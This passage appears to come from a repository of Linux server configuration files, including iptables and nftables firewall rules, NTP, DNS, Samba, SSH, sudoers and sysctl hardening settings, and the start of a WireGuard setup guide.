RH0 packet to prevent ping-pong 11 | -6 -A INPUT -m rt --rt-type 0 -j DROP 12 | -6 -A FORWARD -m rt --rt-type 0 -j DROP 13 | -6 -A OUTPUT -m rt --rt-type 0 -j DROP 14 | 15 | ############################################################################## 16 | # INPUT filters 17 | 18 | # Trust local loopback 19 | -A INPUT -i lo -j ACCEPT 20 | 21 | # Drop invalid packets 22 | -A INPUT -m conntrack --ctstate INVALID -j DROP 23 | 24 | # port range is in /proc/sys/net/ipv4/ip_local_port_range 25 | # If conntrack is not available (old kernel), use -m state --state instead 26 | -A INPUT -p tcp -m tcp --dport 32768:61000 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT 27 | -A INPUT -p udp -m udp --dport 32768:61000 -m conntrack --ctstate ESTABLISHED -j ACCEPT 28 | # Most DNS resolvers (BIND, PowerDNS, ...) use their own ports numbers 29 | -A INPUT -p udp -m udp --sport 53 --dport 1024:65535 -j ACCEPT 30 | 31 | # If conntrack module is not available, state module doesn't work well for IPv6 32 | # so use these rules instead 33 | #-6 -A INPUT -p tcp -m tcp --dport 32768:61000 ! --syn -j ACCEPT 34 | #-6 -A INPUT -p udp -m udp --dport 32768:61000 -j ACCEPT 35 | 36 | 37 | # ICMPv4 echo reply, dest unreachable, echo request, time exceeded, parameter problem 38 | -4 -A INPUT -p icmp -m icmp --icmp-type 0/0 -j ACCEPT 39 | -4 -A INPUT -p icmp -m icmp --icmp-type 3 -j ACCEPT 40 | -4 -A INPUT -p icmp -m icmp --icmp-type 8/0 -j ACCEPT 41 | -4 -A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT 42 | -4 -A INPUT -p icmp -m icmp --icmp-type 12 -j ACCEPT 43 | 44 | # ICMPv6 dest unreachable, packet too big, time exceeded, parameter problem 45 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 1 -j ACCEPT 46 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 2 -j ACCEPT 47 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 3 -j ACCEPT 48 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 4 -j ACCEPT 49 | # ICMPv6 echo request, echo reply 50 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 128/0 -j ACCEPT 51 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 129/0 -j ACCEPT 52 | # Neighbor Discovery Protocol: RS, RA, NS, NA 53 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 133/0 -j ACCEPT 54 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 134/0 -j ACCEPT 55 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 135/0 -j ACCEPT 56 | -6 -A INPUT -p ipv6-icmp -m icmp6 --icmpv6-type 136/0 -j ACCEPT 57 | 58 | 59 | # Accept SSH, HTTP and HTTPS 60 | -A INPUT -p tcp -m multiport --dports 22,80,443 -j ACCEPT 61 | 62 | # Accept SMTP, IMAP, SMTPS, IMAPS 63 | -A INPUT -p tcp -m multiport --dports 25,143,587,993 -j ACCEPT 64 | 65 | # Accept NTP 66 | -A INPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT 67 | 68 | # Silently drop NetBios 69 | -A INPUT -p tcp -m multiport --dports 139,445 -j DROP 70 | -A INPUT -p udp -m udp --dport 137:138 -j DROP 71 | 72 | # Silently drop unsollicited broadcast and multicast 73 | -A INPUT -m pkttype --pkt-type broadcast -j DROP 74 | -A INPUT -m pkttype --pkt-type multicast -j DROP 75 | # This rule is still here to really avoid rejecting an IPv4 broadcast 76 | -4 -A INPUT -d 255.255.255.255/32 -j DROP 77 | 78 | # Log to NetFilter, so that logs don't fills up and debugging is quick 79 | #-A INPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[IN DROP] " 80 | -A INPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG 81 | 82 | # Reject packet, with some stats in iptables -nvL and ip6tables -nvL 83 | -A INPUT -p tcp -j REJECT --reject-with tcp-reset 84 | -4 -A INPUT -p udp -j REJECT --reject-with icmp-port-unreachable 85 | -6 -A INPUT -p udp -j REJECT --reject-with icmp6-port-unreachable 86 | -4 -A INPUT -p icmp -j DROP 87 | -6 -A INPUT -p ipv6-icmp -j DROP 88 | -4 -A INPUT -j REJECT --reject-with icmp-proto-unreachable 89 | -6 -A INPUT -j REJECT 90 | 91 | 92 | ############################################################################## 93 | # OUTPUT filters 94 | 95 | # These filters respect the symmetry of INPUT filters 96 | 97 | -A OUTPUT -o lo -j ACCEPT 98 | -4 -A OUTPUT -p icmp -j ACCEPT 99 | -6 -A OUTPUT -p ipv6-icmp -j ACCEPT 100 | 101 | # Accept TCP reset and FIN+ACK 102 | -A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j ACCEPT 103 | -A OUTPUT -p tcp -m tcp --tcp-flags FIN,ACK FIN,ACK -j ACCEPT 104 | 105 | -4 -A OUTPUT -d 255.255.255.255/32 -j DROP 106 | -4 -A OUTPUT -m conntrack --ctstate INVALID -j DROP 107 | 108 | -A OUTPUT -p tcp -m tcp --sport 32768:61000 -j ACCEPT 109 | -A OUTPUT -p udp -m udp --sport 32768:61000 -j ACCEPT 110 | -A OUTPUT -p udp -m udp --sport 1024:65535 --dport 53 -j ACCEPT 111 | 112 | -A OUTPUT -p tcp -m multiport --sports 22,80,443 -j ACCEPT 113 | -A OUTPUT -p tcp -m multiport --sports 25,143,587,993 -j ACCEPT 114 | -A OUTPUT -p udp -m udp --sport 123 --dport 123 -j ACCEPT 115 | 116 | #-A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j LOG --log-prefix "[OUT DROP] " 117 | -A OUTPUT -m limit --limit 1/sec --limit-burst 1000 -j NFLOG 118 | 119 | # Reject other packets, with some stats in iptables -nvL and ip6tables -nvL 120 | -A OUTPUT -p tcp -j REJECT --reject-with tcp-reset 121 | -4 -A OUTPUT -p udp -j REJECT --reject-with icmp-port-unreachable 122 | -6 -A OUTPUT -p udp -j REJECT --reject-with icmp6-port-unreachable 123 | -4 -A OUTPUT -j REJECT --reject-with icmp-proto-unreachable 124 | -6 -A OUTPUT -j REJECT 125 | 126 | COMMIT 127 | -------------------------------------------------------------------------------- /etc/nftables-server.conf: -------------------------------------------------------------------------------- 1 | #!/usr/bin/nft -f 2 | # Example of /etc/nftables.conf content for a server 3 | # 4 | # Reference table: 5 | # https://wiki.nftables.org/wiki-nftables/index.php/Quick_reference-nftables_in_10_minutes 6 | 7 | flush ruleset 8 | 9 | table inet filter { 10 | set SSH_IPv4_clients { 11 | type ipv4_addr 12 | elements = { 192.168.0.1 } 13 | } 14 | set SSH_IPv6_clients { 15 | type ipv6_addr 16 | elements = { fe80::1 } 17 | } 18 | chain input { 19 | type filter hook input priority 0; policy accept; 20 | rt type 0 counter drop comment "disable processing of any RH0 packet to prevent ping-pong" 21 | iifname "lo" accept comment "trust local loopback" 22 | ct state { established, related} counter accept comment "accept established connections" 23 | ct state invalid counter drop comment "drop invalid connections" 24 | 25 | ip protocol icmp icmp type 0 icmp code 0 counter accept comment "accept ICMPv4 echo reply" 26 | ip protocol icmp icmp type 3 counter accept comment "accept ICMPv4 dest unreachable" 27 | ip protocol icmp icmp type 8 icmp code 0 counter accept comment "accept ICMPv4 echo request" 28 | ip protocol icmp icmp type 11 counter accept comment "accept ICMPv4 time exceeded" 29 | ip protocol icmp icmp type 12 counter accept comment "accept ICMPv4 parameter problem" 30 | 31 | ip6 nexthdr ipv6-icmp icmpv6 type 1 counter accept comment "accept ICMPv6 dest unreachable" 32 | ip6 nexthdr ipv6-icmp icmpv6 type 2 counter accept comment "accept ICMPv6 packet too big" 33 | ip6 nexthdr ipv6-icmp icmpv6 type 3 counter accept comment "accept ICMPv6 time exceeded" 34 | ip6 nexthdr ipv6-icmp icmpv6 type 4 counter accept comment "accept ICMPv6 parameter problem" 35 | ip6 nexthdr ipv6-icmp icmpv6 type 128 icmpv6 code 0 counter accept comment "accept ICMPv6 echo request" 36 | ip6 nexthdr ipv6-icmp icmpv6 type 129 icmpv6 code 0 counter accept comment "accept ICMPv6 echo reply" 37 | ip6 nexthdr ipv6-icmp icmpv6 type 133 icmpv6 code 0 counter accept comment "accept ICMPv6 router solicitation" 38 | ip6 nexthdr ipv6-icmp icmpv6 type 134 icmpv6 code 0 counter accept comment "accept ICMPv6 router advertisement" 39 | ip6 nexthdr ipv6-icmp icmpv6 type 135 icmpv6 code 0 counter accept comment "accept ICMPv6 neighbor solicitation" 40 | ip6 nexthdr ipv6-icmp icmpv6 type 136 icmpv6 code 0 counter accept comment "accept ICMPv6 neighbor advertisement" 41 | 42 | #tcp dport 22 counter accept comment "accept SSH" 43 | ip saddr @SSH_IPv4_clients tcp dport 22 counter accept comment "accept SSH from trusted IPv4 clients" 44 | ip6 saddr @SSH_IPv6_clients tcp dport 22 counter accept comment "accept SSH from trusted IPv6 clients" 45 | tcp dport { 80, 443} counter accept comment "accept HTTP and HTTPS" 46 | #tcp dport { 25, 143, 587, 993} counter accept comment "accept SMTP, IMAP, SMTPS, IMAPS" 47 | udp sport 123 udp dport 123 counter accept comment "accept NTP" 48 | 49 | tcp dport { 139, 445} counter drop comment "silently drop NetBios" 50 | udp dport { 137, 138} counter drop comment "silently drop NetBios" 51 | 52 | meta pkttype broadcast counter drop comment "silently drop unsollicited broadcast" 53 | meta pkttype multicast counter drop comment "silently drop unsollicited multicast" 54 | ip daddr 255.255.255.255/32 counter drop comment "really drop unsollicited IPv4 broadcast" 55 | 56 | # Log to NetFilter, so that logs don't fills up and debugging is quick 57 | #limit rate 1/second log prefix "[IN DROP] " comment "log to kernel logs" 58 | counter limit rate 10/second log prefix "[IN DROP] " group 0 comment "log to NFLOG" 59 | ip protocol tcp counter reject with tcp reset comment "reject IPv4 TCP input with TCP RST" 60 | ip6 nexthdr tcp counter reject with tcp reset comment "reject IPv6 TCP input with TCP RST" 61 | ip protocol udp counter reject with icmp type port-unreachable comment "reject IPv4 UDP input with ICMP port unreachable" 62 | ip6 nexthdr udp counter reject with icmpv6 type port-unreachable comment "reject IPv6 UDP input with ICMPv6 port unreachable" 63 | ip protocol icmp counter drop comment "drop IPv4 ICMP input" 64 | ip6 nexthdr icmpv6 counter drop comment "drop IPv6 ICMPv6 input" 65 | counter reject with icmp type prot-unreachable comment "reject unknown IPv4 protocol with ICMP protocol unreachable" 66 | counter reject with icmpx type port-unreachable comment "reject everything remaining with ICMP port unreachable" 67 | } 68 | 69 | chain prerouting { 70 | type filter hook prerouting priority 0; policy accept; 71 | # Requires Linux >= 4.10 and nft >= 0.7 72 | fib saddr . iif oif eq 0 counter drop comment "implement Reverse Path filtering" 73 | } 74 | 75 | chain forward { 76 | type filter hook forward priority 0; policy drop; 77 | rt type 0 counter drop comment "disable processing of any RH0 packet to prevent ping-pong" 78 | drop 79 | } 80 | 81 | chain output { 82 | type filter hook output priority 0; policy accept; 83 | rt type 0 counter drop comment "disable processing of any RH0 packet to prevent ping-pong" 84 | oifname "lo" accept comment "trust local loopback" 85 | ip protocol icmp counter accept comment "accept sending ICMPv4" 86 | ip6 nexthdr ipv6-icmp counter accept comment "accept sending ICMPv6" 87 | tcp flags rst counter accept comment "accept sending TCP RST" 88 | tcp flags & (fin|ack) == fin|ack counter accept comment "accept sending TCP FIN+ACK" 89 | 90 | ip daddr 255.255.255.255/32 counter drop comment "do not emit IPv4 broadcast" 91 | ct state invalid counter drop comment "drop invalid connections" 92 | tcp sport { 1024-65535} counter accept comment "accept TCP client" 93 | udp sport { 1024-65535} counter accept comment "accept UDP client" 94 | 95 | tcp sport 22 counter accept comment "accept SSH" 96 | tcp sport { 80, 443} counter accept comment "accept HTTP and HTTPS" 97 | #tcp sport { 25, 143, 587, 993} counter accept comment "accept SMTP, IMAP, SMTPS, IMAPS" 98 | udp sport 123 udp dport 123 counter accept comment "accept NTP" 99 | 100 | counter limit rate 10/second log prefix "[OUT DROP] " group 0 comment "log to NFLOG" 101 | counter reject 102 | } 103 | } 104 | -------------------------------------------------------------------------------- /etc/ntp.conf: -------------------------------------------------------------------------------- 1 | # /etc/ntp.conf, configuration for ntpd; see ntp.conf(5) for help 2 | 3 | # Location of drift file 4 | driftfile /var/lib/ntp/ntp.drift 5 | 6 | 7 | # Enable this if you want statistics to be logged. 8 | #statsdir /var/log/ntpstats/ 9 | 10 | statistics loopstats peerstats clockstats 11 | filegen loopstats file loopstats type day enable 12 | filegen peerstats file peerstats type day enable 13 | filegen clockstats file clockstats type day enable 14 | 15 | 16 | # You do need to talk to an NTP server or two (or three). 17 | #server ntp.your-provider.example 18 | 19 | # pool.ntp.org maps to about 1000 low-stratum NTP servers. Your server will 20 | # pick a different set every time it starts up. Please consider joining the 21 | # pool: 22 | # 23 | # You may change these names with your distribution (*.debian.pool.ntp.org) or 24 | # your country (*.fr.pool.ntp.org) 25 | server 0.pool.ntp.org iburst 26 | server 1.pool.ntp.org iburst 27 | server 2.pool.ntp.org iburst 28 | server 3.pool.ntp.org iburst 29 | 30 | 31 | # Access control configuration 32 | # The web page 33 | # might be helpful. 34 | # 35 | # Note that "restrict" applies to both servers and clients, so a configuration 36 | # that might be intended to block requests from certain clients could also end 37 | # up blocking replies from your own upstream servers. 38 | 39 | # By default, exchange time with everybody, but don't allow configuration. 40 | restrict -4 default kod notrap nomodify nopeer noquery 41 | restrict -6 default kod notrap nomodify nopeer noquery 42 | 43 | # Local users may interrogate the ntp server more closely. 44 | restrict 127.0.0.1 45 | restrict ::1 46 | -------------------------------------------------------------------------------- /etc/resolv.conf: -------------------------------------------------------------------------------- 1 | # Use Google public DNS servers when nothing else is available. 2 | # google-public-dns-a.google.com. = 8.8.8.8 and 2001:4860:4860::8888 3 | # google-public-dns-b.google.com. = 8.8.4.4 and 2001:4860:4860::8844 4 | nameserver 8.8.8.8 5 | nameserver 8.8.4.4 6 | 7 | # OpenDNS resolvers 8 | # http://www.opendns.com/opendns-ip-addresses/ 9 | nameserver 208.67.222.222 10 | nameserver 208.67.220.220 11 | -------------------------------------------------------------------------------- /etc/samba/smb.conf: -------------------------------------------------------------------------------- 1 | # Configuration file for Samba client (smbclient, gvfs-smb, etc.) and server. 2 | # This file is either in /etc/samba/smb.conf or /usr/local/samba/lib/smb.conf. 3 | # 4 | # Documentation: 5 | # - https://www.samba.org/samba/docs/Samba-HOWTO-Collection.pdf 6 | [global] 7 | # Workgroup or NT domain name that the Samba server is part of 8 | workgroup = WORKGROUP 9 | 10 | # NetBIOS name (the hostname, by default) 11 | netbios name = MyName 12 | 13 | # server string is the equivalent of the NT Description field 14 | server string = Samba Server 15 | 16 | # Be compatible with recent Microsoft Servers which disabled SMBv1 17 | client max protocol = SMB3 18 | 19 | # Security mode (share, user, server, domain or ads) 20 | security = user 21 | 22 | # Restrict connections to machines on the local network and loopback 23 | hosts allow = 10. 172.16. 192.168. 127. 24 | 25 | # For a share that allows file upload, uncomment these lines 26 | ;[share] 27 | ; comment = Share for upload 28 | ; path = /srv/samba 29 | ; public = yes 30 | ; writable = yes 31 | ; printable = no 32 | ; create mask = 0770 33 | -------------------------------------------------------------------------------- /etc/ssh/sshd_config: -------------------------------------------------------------------------------- 1 | # Here is a general configuration file for SSH server 2 | # Verify the applied configuration with: sshd -T 3 | 4 | # Authentication mechanisms: allow public key, disable password access 5 | PubkeyAuthentication yes 6 | PasswordAuthentication no 7 | 8 | # Some other config values 9 | PermitRootLogin no 10 | PermitEmptyPasswords no 11 | ChallengeResponseAuthentication no 12 | UsePAM yes 13 | X11Forwarding no 14 | UseDNS yes 15 | PermitTunnel no 16 | 17 | # Restrict allowed users 18 | #AllowUsers user 19 | #AllowGroups adm sudo wheel 20 | 21 | # This configuration jails users in sftpusers group to only use sftp. 22 | # Their home directory must belong to root, otherwise sshd complains with: 23 | # fatal: bad ownership or modes for chroot directory "/home/user" 24 | # Documentation: https://wiki.archlinux.org/index.php/SFTP_chroot 25 | Subsystem sftp internal-sftp 26 | Match Group sftpusers 27 | ChrootDirectory /home/%u 28 | ForceCommand internal-sftp 29 | AllowTcpForwarding no 30 | X11Forwarding no 31 | -------------------------------------------------------------------------------- /etc/ssh/sshd_config.default: -------------------------------------------------------------------------------- 1 | # $OpenBSD: sshd_config,v 1.89 2013/02/06 00:20:42 dtucker Exp $ 2 | 3 | # This is the sshd server system-wide configuration file. See 4 | # sshd_config(5) for more information. 5 | 6 | # This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin 7 | 8 | # The strategy used for options in the default sshd_config shipped with 9 | # OpenSSH is to specify options with their default value where 10 | # possible, but leave them commented. Uncommented options override the 11 | # default value. 12 | 13 | #Port 22 14 | #AddressFamily any 15 | #ListenAddress 0.0.0.0 16 | #ListenAddress :: 17 | 18 | # The default requires explicit activation of protocol 1 19 | #Protocol 2 20 | 21 | # HostKey for protocol version 1 22 | #HostKey /etc/ssh/ssh_host_key 23 | # HostKeys for protocol version 2 24 | #HostKey /etc/ssh/ssh_host_rsa_key 25 | #HostKey /etc/ssh/ssh_host_dsa_key 26 | #HostKey /etc/ssh/ssh_host_ecdsa_key 27 | 28 | # Lifetime and size of ephemeral version 1 server key 29 | #KeyRegenerationInterval 1h 30 | #ServerKeyBits 1024 31 | 32 | # Logging 33 | # obsoletes QuietMode and FascistLogging 34 | #SyslogFacility AUTH 35 | #LogLevel INFO 36 | 37 | # Authentication: 38 | 39 | #LoginGraceTime 2m 40 | #PermitRootLogin yes 41 | #StrictModes yes 42 | #MaxAuthTries 6 43 | #MaxSessions 10 44 | 45 | #RSAAuthentication yes 46 | #PubkeyAuthentication yes 47 | 48 | # The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2 49 | # but this is overridden so installations will only check .ssh/authorized_keys 50 | AuthorizedKeysFile .ssh/authorized_keys 51 | 52 | #AuthorizedPrincipalsFile none 53 | 54 | #AuthorizedKeysCommand none 55 | #AuthorizedKeysCommandUser nobody 56 | 57 | # For this to work you will also need host keys in /etc/ssh/ssh_known_hosts 58 | #RhostsRSAAuthentication no 59 | # similar for protocol version 2 60 | #HostbasedAuthentication no 61 | # Change to yes if you don't trust ~/.ssh/known_hosts for 62 | # RhostsRSAAuthentication and HostbasedAuthentication 63 | #IgnoreUserKnownHosts no 64 | # Don't read the user's ~/.rhosts and ~/.shosts files 65 | #IgnoreRhosts yes 66 | 67 | # To disable tunneled clear text passwords, change to no here! 68 | #PasswordAuthentication yes 69 | #PermitEmptyPasswords no 70 | 71 | # Change to no to disable s/key passwords 72 | ChallengeResponseAuthentication no 73 | 74 | # Kerberos options 75 | #KerberosAuthentication no 76 | #KerberosOrLocalPasswd yes 77 | #KerberosTicketCleanup yes 78 | #KerberosGetAFSToken no 79 | 80 | # GSSAPI options 81 | #GSSAPIAuthentication no 82 | #GSSAPICleanupCredentials yes 83 | 84 | # Set this to 'yes' to enable PAM authentication, account processing, 85 | # and session processing. If this is enabled, PAM authentication will 86 | # be allowed through the ChallengeResponseAuthentication and 87 | # PasswordAuthentication. Depending on your PAM configuration, 88 | # PAM authentication via ChallengeResponseAuthentication may bypass 89 | # the setting of "PermitRootLogin without-password". 90 | # If you just want the PAM account and session checks to run without 91 | # PAM authentication, then enable this but set PasswordAuthentication 92 | # and ChallengeResponseAuthentication to 'no'. 93 | UsePAM yes 94 | 95 | #AllowAgentForwarding yes 96 | #AllowTcpForwarding yes 97 | #GatewayPorts no 98 | #X11Forwarding no 99 | #X11DisplayOffset 10 100 | #X11UseLocalhost yes 101 | PrintMotd no # pam does that 102 | #PrintLastLog yes 103 | #TCPKeepAlive yes 104 | #UseLogin no 105 | UsePrivilegeSeparation sandbox # Default for new installations. 106 | #PermitUserEnvironment no 107 | #Compression delayed 108 | #ClientAliveInterval 0 109 | #ClientAliveCountMax 3 110 | #UseDNS yes 111 | #PidFile /run/sshd.pid 112 | #MaxStartups 10:30:100 113 | #PermitTunnel no 114 | #ChrootDirectory none 115 | #VersionAddendum none 116 | 117 | # no default banner path 118 | #Banner none 119 | 120 | # override default of no subsystems 121 | Subsystem sftp /usr/lib/ssh/sftp-server 122 | 123 | # Example of overriding settings on a per-user basis 124 | #Match User anoncvs 125 | # X11Forwarding no 126 | # AllowTcpForwarding no 127 | # ForceCommand cvs server 128 | -------------------------------------------------------------------------------- /etc/sudoers: -------------------------------------------------------------------------------- 1 | ## sudoers file. 2 | ## 3 | ## This file MUST be edited with the 'visudo' command as root. 4 | ## Failure to use 'visudo' may result in syntax or file permission errors 5 | ## that prevent sudo from running. 6 | ## 7 | ## See the sudoers man page for the details on how to write a sudoers file. 8 | ## 9 | 10 | ## 11 | ## Host alias specification 12 | ## 13 | ## Groups of machines. These may include host names (optionally with wildcards), 14 | ## IP addresses, network numbers or netgroups. 15 | # Host_Alias WEBSERVERS = www1, www2, www3 16 | 17 | ## 18 | ## User alias specification 19 | ## 20 | ## Groups of users. These may consist of user names, uids, Unix groups, 21 | ## or netgroups. 22 | # User_Alias ADMINS = millert, dowdy, mikef 23 | 24 | ## 25 | ## Cmnd alias specification 26 | ## 27 | ## Groups of commands. Often used to group related commands together. 28 | # Cmnd_Alias PROCESSES = /usr/bin/nice, /bin/kill, /usr/bin/renice, \ 29 | # /usr/bin/pkill, /usr/bin/top 30 | 31 | ## 32 | ## Defaults specification 33 | ## 34 | ## You may wish to keep some of the following environment variables 35 | ## when running commands via sudo. 36 | ## 37 | ## Locale settings 38 | # Defaults env_keep += "LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET" 39 | ## 40 | ## Run X applications through sudo; HOME is used to find the 41 | ## .Xauthority file. Note that other programs use HOME to find 42 | ## configuration files and this may lead to privilege escalation! 43 | # Defaults env_keep += "HOME" 44 | Defaults env_keep += "HOME" 45 | ## 46 | ## X11 resource path settings 47 | # Defaults env_keep += "XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH" 48 | ## 49 | ## Desktop path settings 50 | # Defaults env_keep += "QTDIR KDEDIR" 51 | ## 52 | ## Allow sudo-run commands to inherit the callers' ConsoleKit session 53 | # Defaults env_keep += "XDG_SESSION_COOKIE" 54 | ## 55 | ## Uncomment to enable special input methods. Care should be taken as 56 | ## this may allow users to subvert the command being run via sudo. 57 | # Defaults env_keep += "XMODIFIERS GTK_IM_MODULE QT_IM_MODULE QT_IM_SWITCHER" 58 | ### Keep Proxy 59 | Defaults env_keep += "http_proxy https_proxy ftp_proxy all_proxy no_proxy" 60 | ## 61 | ## Uncomment to enable logging of a command's output, except for 62 | ## sudoreplay and reboot. Use sudoreplay to play back logged sessions. 63 | # Defaults log_output 64 | # Defaults!/usr/bin/sudoreplay !log_output 65 | # Defaults!/usr/local/bin/sudoreplay !log_output 66 | # Defaults!REBOOT !log_output 67 | ## 68 | ## Override built-in defaults 69 | ## 70 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" 71 | Defaults env_reset, env_keep += "HOME SSH_CLIENT SSH_CONNECTION SSH_TTY" 72 | Defaults editor=/usr/bin/vim, !env_editor 73 | Defaults mail_badpass, mail_no_user, mail_no_host, mail_no_perms, mailto=root 74 | Defaults insults, runas_default=root, timestamp_timeout=1 75 | Defaults requiretty, use_pty, ignore_dot 76 | # Use root or user password 77 | Defaults rootpw, passprompt="Password for root@%h:" 78 | #Defaults passprompt="Password for %u@%h:" 79 | 80 | ## 81 | ## Runas alias specification 82 | ## 83 | 84 | ## 85 | ## User privilege specification 86 | ## 87 | root ALL=(ALL) ALL 88 | 89 | ## Uncomment to allow members of group wheel to execute any command 90 | %wheel ALL=(ALL) ALL 91 | 92 | ## Same thing without a password 93 | # %wheel ALL=(ALL) NOPASSWD: ALL 94 | 95 | ## Uncomment to allow members of group sudo to execute any command 96 | # %sudo ALL=(ALL) ALL 97 | 98 | ## Uncomment to allow any user to run sudo if they know the password 99 | ## of the user they are running the command as (root by default). 100 | # Defaults targetpw # Ask for the password of the target user 101 | # ALL ALL=(ALL) ALL # WARNING: only use this together with 'Defaults targetpw' 102 | 103 | ## Read drop-in files from /etc/sudoers.d 104 | ## (the '#' here does not indicate a comment) 105 | #includedir /etc/sudoers.d 106 | -------------------------------------------------------------------------------- /etc/sysctl.conf: -------------------------------------------------------------------------------- 1 | # /etc/sysctl.conf - Configuration file for setting system variables 2 | # See /etc/sysctl.d/ for additional system variables. 3 | # See sysctl.conf (5) for information. 4 | # 5 | # Documentation: 6 | # * https://www.kernel.org/doc/Documentation/sysctl/ 7 | # * https://www.kernel.org/doc/Documentation/networking/ip-sysctl.txt 8 | 9 | 10 | ################################################################### 11 | # Basic system settings 12 | # 13 | 14 | # Stop low-level messages on console (default 4 4 1 4) 15 | #kernel.printk = 3 4 1 3 16 | 17 | # Tweak how the flow of kernel messages is throttled. 18 | #kernel.printk_ratelimit_burst = 10 19 | #kernel.printk_ratelimit = 5 20 | 21 | # Have the CD-ROM close when you use it, and open when you are done 22 | #dev.cdrom.autoclose = 1 23 | #dev.cdrom.autoeject = 1 24 | 25 | # Reboot 600 seconds after kernel panic or oops. 26 | #kernel.panic_on_oops = 1 27 | #kernel.panic = 600 28 | 29 | 30 | ################################################################### 31 | # Performance settings 32 | # 33 | 34 | # Increase TCP max buffer size setable using setsockopt (default 6291456) 35 | #net.ipv4.tcp_rmem = 4096 87380 8388608 36 | #net.ipv4.tcp_wmem = 4096 87380 8388608 37 | 38 | # Increase auto tuning TCP buffer limits (default 212992 212992 1000 1) 39 | #net.core.rmem_max = 8388608 40 | #net.core.wmem_max = 8388608 41 | #net.core.netdev_max_backlog = 5000 42 | #net.ipv4.tcp_window_scaling = 1 43 | 44 | # Disable laptop mode 45 | #vm.laptop_mode = 0 46 | 47 | # Control swap usage (low = less aggressive swapping) 48 | #vm.swappiness = 60 49 | 50 | # Some disk syncing parameters 51 | #vm.dirty_background_ratio = 10 52 | #vm.dirty_ratio = 40 53 | #vm.vfs_cache_pressure = 100 54 | 55 | 56 | ################################################################### 57 | # Network security 58 | # 59 | 60 | # Enable Reverse Path filter (spoof protection) in all interfaces 61 | net.ipv4.conf.default.rp_filter = 1 62 | net.ipv4.conf.all.rp_filter = 1 63 | 64 | # Enable TCP/IP SYN cookies for IPv4 and IPv6 65 | # See http://lwn.net/Articles/277146/ 66 | net.ipv4.tcp_syncookies = 1 67 | 68 | # Don't reply to broadcast/multicast ping 69 | net.ipv4.icmp_echo_ignore_broadcasts = 1 70 | 71 | # Do not accept ICMP redirects (prevent MITM attacks) 72 | net.ipv4.conf.default.accept_redirects = 0 73 | net.ipv4.conf.all.accept_redirects = 0 74 | net.ipv6.conf.default.accept_redirects = 0 75 | net.ipv6.conf.all.accept_redirects = 0 76 | 77 | # Do not accept ICMP redirects from gateways listed in default gateway list 78 | net.ipv4.conf.default.secure_redirects = 0 79 | net.ipv4.conf.all.secure_redirects = 0 80 | 81 | # Do not accept IP source route packets 82 | net.ipv4.conf.default.accept_source_route = 0 83 | net.ipv4.conf.all.accept_source_route = 0 84 | net.ipv6.conf.default.accept_source_route = 0 85 | net.ipv6.conf.all.accept_source_route = 0 86 | 87 | # Use IPv6 temporary addresses and prefer them over public addresses 88 | net.ipv6.conf.default.use_tempaddr = 2 89 | net.ipv6.conf.all.use_tempaddr = 2 90 | 91 | # Log Martian Packets (disabled) 92 | #net.ipv4.conf.all.log_martians = 1 93 | 94 | # Tweak the port range used for outgoing connections over IPv4 and IPv6 95 | #net.ipv4.ip_local_port_range = 32768 61000 96 | 97 | 98 | ################################################################### 99 | # Non-router network configuration (change these options on a router) 100 | # 101 | 102 | # Disable packet forwarding 103 | net.ipv4.ip_forward = 0 104 | net.ipv6.conf.default.forwarding = 0 105 | net.ipv6.conf.all.forwarding = 0 106 | 107 | # Do not send ICMP redirects 108 | net.ipv4.conf.default.send_redirects = 0 109 | net.ipv4.conf.all.send_redirects = 0 110 | 111 | 112 | ################################################################### 113 | # System security settings 114 | 115 | # Restrict dmesg 116 | kernel.dmesg_restrict = 1 117 | 118 | # Nullify kernel pointers in messages 119 | kernel.kptr_restrict = 2 120 | 121 | # Enable ASLR for everything in process memory 122 | kernel.randomize_va_space = 2 123 | 124 | # Restrict Magic SysRq to control keyboard, sync, RO-remount and reboot/poweroff 125 | # To completely disable SysRq, set this value to zero 126 | kernel.sysrq = 180 127 | -------------------------------------------------------------------------------- /etc/wireguard.rst: -------------------------------------------------------------------------------- 1 | ``etc/wireguard/``: WireGuard VPN 2 | ================================= 3 | 4 | Installation 5 | ------------ 6 | 7 | Installing WireGuard is quite simple. 8 | It is documented on several places: 9 | 10 | * For Arch Linux: https://wiki.archlinux.org/index.php/WireGuard 11 | 12 | .. code-block:: sh 13 | 14 | pacman -S wireguard-dkms wireguard-tools 15 | 16 | * For Debian: https://www.linode.com/docs/networking/vpn/set-up-wireguard-vpn-on-debian/ 17 | 18 | .. code-block:: sh 19 | 20 | # Add unstable repository with a low priority (the default one is 500) 21 | echo "deb http://deb.debian.org/debian/ unstable main" > /etc/apt/sources.list.d/unstable-wireguard.list 22 | printf 'Package: *\nPin: release a=unstable\nPin-Priority: 150\n' > /etc/apt/preferences.d/limit-unstable 23 | apt-get update && apt-get install wireguard-dkms wireguard-tools 24 | 25 | * For Fedora: https://www.wireguard.com/install/ 26 | 27 | .. code-block:: sh 28 | 29 | dnf copr enable jdoss/wireguard 30 | dnf install wireguard-dkms wireguard-tools 31 | 32 | 33 | Configuration 34 | ------------- 35 | 36 | In order to generate the private key of a host, as ``root``: 37 | 38 | .. code-block:: sh 39 | 40 | cd /etc/wireguard 41 | (umask 277 && wg genkey | tee privatekey | wg pubkey > publickey) 42 | 43 | An optional pre-shared key can also be generated: 44 | 45 | .. 